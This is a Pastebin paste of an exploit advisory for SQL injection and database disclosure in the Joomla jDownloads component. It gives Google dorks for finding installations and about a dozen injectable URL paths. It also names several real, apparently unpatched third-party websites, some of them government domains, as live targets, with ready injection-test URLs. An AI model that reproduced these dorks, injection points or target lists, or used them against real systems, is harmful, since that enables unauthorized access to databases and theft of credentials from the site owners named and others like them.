Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla jDownloads 3.2.63 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 10/02/2019
- # Vendor Homepage : jdownloads.com
- # Software Download Link :
- jdownloads.com/index.php/downloads/download/6-jdownloads/2-jdownloads-3-2.html
- jdownloads.com/index.php?start=28
- github.com/sahebkanodia/HostelWebsite/tree/master/administrator/components/com_jdownloads
- # Software Information Link : extensions.joomla.org/extension/jdownloads/
- # Software Version : 3.2.63 and 3.2.62 - 3.2.61 - 3.2.33 and all other previous versions.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jdownloads''
- intext:''Powered by jDownloads''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- jDownload is the Extensive Download Manager for Joomla!
- ####################################################################
- # Impact :
- ***********
- * Joomla jDownloads 3.2.63 and other versions - component for Joomla is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jdownloads&task=summary&cid=[SQL Injection]
- /index.php?option=com_jdownloads&task=summary&cid=[SQL Injection]&catid=[SQL Injection]
- /index.php?option=com_jdownloads&task=summary&cid=[ID-NUMBER]&catid=[SQL Injection]
- /index.php?option=com_jdownloads&Itemid=[ID-NUMBER]&view=finish&cid=[ID-NUMBER]&catid=[SQL Injection]
- /index.php?option=com_jdownloads&view=viewcategories&Itemid=[SQL Injection]
- /index.php?option=com_jdownloads&task=viewcategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_jdownloads&view=download&id=[ID-NUMBER]:[FOLDER-NAME]&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_jdownloads&Itemid=[ID-NUMBER]&view=viewcategory&catid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_jdownloads&Itemid=[ID-NUMBER]&view=viewcategory&catid=[ID-NUMBER]&limitstart=[SQL Injection]&order=hits&dir=asc
- /index.php?option=com_jdownloads&view=download&id=[ID-NUMBER]&catid=[SQL Injection]
- /index.php?option=com_jdownloads&Itemid=[ID-NUMBER]&view=finish&cid=[ID-NUMBER]&catid=[ID-NUMBER]&m=[SQL Injection]
- /component/option,com_jdownloads/Itemid,[ID-NUMBER]/index.php?option=com_content&task=category§ionid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_jdownloads/sql/updates/mysql/0.0.1.sql
- /administrator/components/com_jdownloads/install.sql
- /administrator/components/com_jdownloads/uninstall.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] irtek-temp.com/index.php?option=com_jdownloads&view=viewcategories&Itemid=59%27
- [+] mail.fer.gov.rw/index.php?option=com_jdownloads&task=viewcategory&catid=4&Itemid=67%27
- [+] bteubsnl.in/index.php?option=com_jdownloads&Itemid=583&view=viewcategory&catid=11&limitstart=10%27&order=hits&dir=asc
- [+] lnx.katana-tv.it/index.php?option=com_jdownloads&view=viewcategories&Itemid=503%27&lang=it
- [+] bldk.mahkamahagung.go.id/index.php?option=com_jdownloads&view=download&id=148&catid=17%27
- [+] brickhillsrotary.co.uk/index.php?option=com_jdownloads&view=download&id=324:vintage-tea-party-poster&catid=17&Itemid=227%27
- [+] bteubsnl.in/index.php?option=com_jdownloads&view=viewcategory&catid=8&Itemid=581%27
- [+] ff-feistritz.at/ff/index.php?option=com_jdownloads&Itemid=21&view=finish&cid=3&catid=7&m=0%27
- [+] speed-jobs.com/index.php?option=com_jdownloads&Itemid=126&view=viewcategory&catid=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Static function JDatabase::test() should not be abstract in
- /home4/kasimedia/public_html/bteubsnl.in/libraries/joomla/database/database.php on line 350
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment